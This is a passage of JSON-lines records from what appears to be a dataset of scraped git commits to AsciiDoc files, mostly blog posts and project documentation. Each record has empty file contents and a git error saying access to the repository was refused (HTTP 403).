stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f13290c0ca0ad1becfbf1bb0ea848f8fa9734a4","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6ce39860fd995af660570e98d9348e86da80226","subject":"JSF init","message":"JSF init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"JSF.adoc","new_file":"JSF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02fc9a23961696cb5d7fad3d865875bcdcd86912","subject":"y2b create post Incase Perforated Snap Case - iPhone 4 \\u0026 4S Case","message":"y2b create post Incase Perforated Snap Case - iPhone 4 \\u0026 4S Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-24-Incase-Perforated-Snap-Case--iPhone-4-u0026-4S-Case.adoc","new_file":"_posts\/2011-11-24-Incase-Perforated-Snap-Case--iPhone-4-u0026-4S-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e61464743e05e5f3a7ff5430da337d91da60f0","subject":"Update 2016-05-25-Starting-up-blogging-again-with-Hub-Press-this-time.adoc","message":"Update 2016-05-25-Starting-up-blogging-again-with-Hub-Press-this-time.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-25-Starting-up-blogging-again-with-Hub-Press-this-time.adoc","new_file":"_posts\/2016-05-25-Starting-up-blogging-again-with-Hub-Press-this-time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16e59ad5037b8b1eeb4ec352d30237ad8e3304af","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dfa67021ac723fd74346f04330d4c95bdc66c54","subject":"Update 2015-02-19-Puppet-Module-Triage.adoc","message":"Update 2015-02-19-Puppet-Module-Triage.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-19-Puppet-Module-Triage.adoc","new_file":"_posts\/2015-02-19-Puppet-Module-Triage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7281ea2eb82084717a1ef8e2e284c18746b57394","subject":"y2b create post The Weirdest One Yet?","message":"y2b create post The Weirdest One Yet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-23-The-Weirdest-One-Yet.adoc","new_file":"_posts\/2016-05-23-The-Weirdest-One-Yet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7ee0e37ff41583155cb682fd3606fe28a3b3629","subject":"Update 2015-03-30-Documentation-online.adoc","message":"Update 2015-03-30-Documentation-online.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-03-30-Documentation-online.adoc","new_file":"_posts\/2015-03-30-Documentation-online.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b79d31afde736346ca1416e8f0568c1907694b87","subject":"add news item","message":"add news 
item\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/05\/clojure-1-11-1.adoc","new_file":"content\/news\/2022\/04\/05\/clojure-1-11-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1c1dbc8fa6f60868f2422442a9279fa7b04a6305","subject":"update to threading guide","message":"update to threading guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/threading_macros.adoc","new_file":"content\/guides\/threading_macros.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0fb46f4c6953cc491fbd3823812ce05accbc5f67","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/second.adoc","new_file":"content\/writings\/second.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"34a46baddfdda87da1225deee0391dab3ae25e7d","subject":"Click +","message":"Click +\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edf7faab501937478c6dfa308a1353b50e292030","subject":"y2b create post Charge Your Phone With A Lamp","message":"y2b create post Charge Your Phone With A Lamp","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-20-Charge-Your-Phone-With-A-Lamp.adoc","new_file":"_posts\/2016-02-20-Charge-Your-Phone-With-A-Lamp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fec6d560b68d9b44465b624e00dc1a10302dddd3","subject":"y2b create post iPhone 6S - No More Bend?","message":"y2b create post iPhone 6S - No More Bend?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-10-iPhone-6S--No-More-Bend.adoc","new_file":"_posts\/2015-08-10-iPhone-6S--No-More-Bend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b84cf26812c4fd75417b8229d366abada9720892","subject":"Update 2016-03-18-Blah-2.adoc","message":"Update 2016-03-18-Blah-2.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Blah-2.adoc","new_file":"_posts\/2016-03-18-Blah-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddc7dd61bb294454146bc909f6e75e57a70c0da7","subject":"y2b create post It's So Oddly Satisfying...","message":"y2b create post It's So Oddly Satisfying...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-13-Its-So-Oddly-Satisfying.adoc","new_file":"_posts\/2017-02-13-Its-So-Oddly-Satisfying.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dceac3a1169a8afef54f67bb361e86afcfc8734","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8529e3db82c0134fe19cd401e7c711a4846a472","subject":"website release guide draft","message":"website release guide draft\n","repos":"pax95\/camel,tadayosi\/camel,apache\/camel,apache\/camel,tadayosi\/camel,christophd\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel,pax95\/camel,pax95\/camel,christophd\/camel,apache\/camel,apache\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/release-guide-website.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/release-guide-website.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38938d48fcf30daa91ef1a390a5fa795d72c19b1","subject":"New page to hold list of abbrieviatins","message":"New page to hold list of abbrieviatins\n","repos":"EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci","old_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EBISPOT\/goci.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f30c62d968c3a33779a4464e4c58be46ee20ec1","subject":"CIP2015-08-06 Date and Time","message":"CIP2015-08-06 Date and Time\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2015-08-06-date-time.adoc","new_file":"cip\/1.accepted\/CIP2015-08-06-date-time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3670636642025c527255a13a84540a1c50c8194","subject":"Create 2014-09-12-forge-2.10.1.final.asciidoc","message":"Create 2014-09-12-forge-2.10.1.final.asciidoc","repos":"addonis1990\/docs,luiz158\/docs,forge\/docs,agoncal\/docs,luiz158\/docs,forge\/docs,addonis1990\/docs,agoncal\/docs","old_file":"news\/2014-09-12-forge-2.10.1.final.asciidoc","new_file":"news\/2014-09-12-forge-2.10.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2f2f1fa57c3fb93a1ec7c8c2a308224e51f69b24","subject":"added","message":"added\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"220979ad87eb4ea84a3f2fbcd9a6604a379c6fc1","subject":"add new deps reference for current prerelease","message":"add new deps reference for current prerelease\n","repos":"clojure\/clojure-site","old_file":"content\/reference\/deps_and_cli_prerelease.adoc","new_file":"content\/reference\/deps_and_cli_prerelease.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"41ffb008ad285735f8bc3c9b97b23c6589a17fef","subject":"Fix doc bug for cgroup cpuacct usage metric","message":"Fix doc bug for cgroup cpuacct usage metric\n\nThis commit fixes a silly doc bug where the field that represents the\ntotal CPU time consumed by all tasks in the same cgroup was mistakenly\nreported as \"usage\" instead of \"usage_nanos\".\n\nRelates 
#21029\n","repos":"GlenRSmith\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,obourgain\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,markwalkom\/elasticsearch,StefanGor\/elasticsearch,JackyMai\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,winstonewert\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,strapdata\/elassandra,mohit\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,fred84\/elasticsearch,alexshadow007\/elasticsearch,nazarewk\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,Helen-Zhao\/elasticsearch,obourgain\/elasticsearch,henakamaMSFT\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,JSCooke\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,fforbeck\/elasticsearch,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,geidies\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,s1monw\/elasticsearch,winstonewert\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,njlawton\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,elasticdog\/elasticsearch,StefanGor\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,rajanm\/elasticsearch,umeshdangat\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,njlawton\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,a2lin\/elasticsearch,gfyoung\/elasticsearch,henakamaMSFT\/elasticsearch,shreejay\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,fforbeck\/elasticsearch,GlenRSmith\/elasticsearch,MaineC\/elasticsearc
h,vroyer\/elasticassandra,jprante\/elasticsearch,fernandozhu\/elasticsearch,GlenRSmith\/elasticsearch,artnowo\/elasticsearch,obourgain\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,rlugojr\/elasticsearch,Shepard1212\/elasticsearch,masaruh\/elasticsearch,mikemccand\/elasticsearch,JSCooke\/elasticsearch,rlugojr\/elasticsearch,vroyer\/elasticassandra,alexshadow007\/elasticsearch,obourgain\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,JSCooke\/elasticsearch,nilabhsagar\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,mikemccand\/elasticsearch,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,nilabhsagar\/elasticsearch,fred84\/elasticsearch,fernandozhu\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,maddin2016\/elasticsearch,C-Bish\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,MisterAndersen\/elasticsearch,maddin2016\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,wuranbo\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,fred84\/elasticsearch,wuranbo\/elasticsearch,scorpionvicky\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,winstonewert\/elasticsearch,JackyMai\/elasticsearch,Helen-Zhao\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,geidies\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,MisterAndersen\/elasticsearch,MisterAndersen\/elasticsearch,mohit\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,vroyer\/elasticassandra,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,bawse\/elasticsearch,a2lin\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,C-Bish\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,ginger
wizard\/elasticsearch,qwerty4030\/elasticsearch,mikemccand\/elasticsearch,C-Bish\/elasticsearch,maddin2016\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,JSCooke\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,jprante\/elasticsearch,mikemccand\/elasticsearch,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,MaineC\/elasticsearch,artnowo\/elasticsearch,Shepard1212\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,Stacey-Gammon\/elasticsearch,StefanGor\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,mortonsykes\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,wuranbo\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,wuranbo\/elasticsearch,LewayneNaidoo\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,coding0011\/elasticsearch","old_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"facce03f003d6fda751e1ca12b69a4e2321b3d70","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-sleuth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f64d0e7aaa95e01a380964c280b8ad1d67b56e1","subject":"Update 2017-04-26-Docker-moving-files-in-and-out-container.adoc","message":"Update 2017-04-26-Docker-moving-files-in-and-out-container.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-04-26-Docker-moving-files-in-and-out-container.adoc","new_file":"_posts\/2017-04-26-Docker-moving-files-in-and-out-container.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a30a287fb46e927f845db6bfc5f89f686c7f7b31","subject":"Update 2017-07-27-Understanding-Inheritance-in-Java-Script.adoc","message":"Update 
2017-07-27-Understanding-Inheritance-in-Java-Script.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2017-07-27-Understanding-Inheritance-in-Java-Script.adoc","new_file":"_posts\/2017-07-27-Understanding-Inheritance-in-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90ac66ff860ba0c7babc1dcdd5d0f916e9d3c0d7","subject":"modify CNCF.adoc","message":"modify CNCF.adoc\n","repos":"ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,zhengxiaochuan-3\/containerfs,shenhuichao\/containerfs,zhengxiaochuan-3\/containerfs,shenhuichao\/containerfs,jls502\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,ipdcode\/containerfs,jls502\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,ipdcode\/containerfs","old_file":"CNCF.adoc","new_file":"CNCF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jls502\/containerfs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31011c8b2a571f28ddda824f8b06c5907a0f3cf5","subject":"Update 2015-09-09-Phoenix-CentOS-6.adoc","message":"Update 2015-09-09-Phoenix-CentOS-6.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-09-09-Phoenix-CentOS-6.adoc","new_file":"_posts\/2015-09-09-Phoenix-CentOS-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f9cfb3f4515c72f4a2f8373d8dbce5f5e8a6fee","subject":"Update 2016-11-05-About-the-Author.adoc","message":"Update 2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9750df5002b66395d9828778cf4bd686cc874928","subject":"update content","message":"update content","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/.adoc","new_file":"content\/writings\/.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2db926912df6d5af50f7bbb295c16e6964582269","subject":"fix old imix profile","message":"fix old imix 
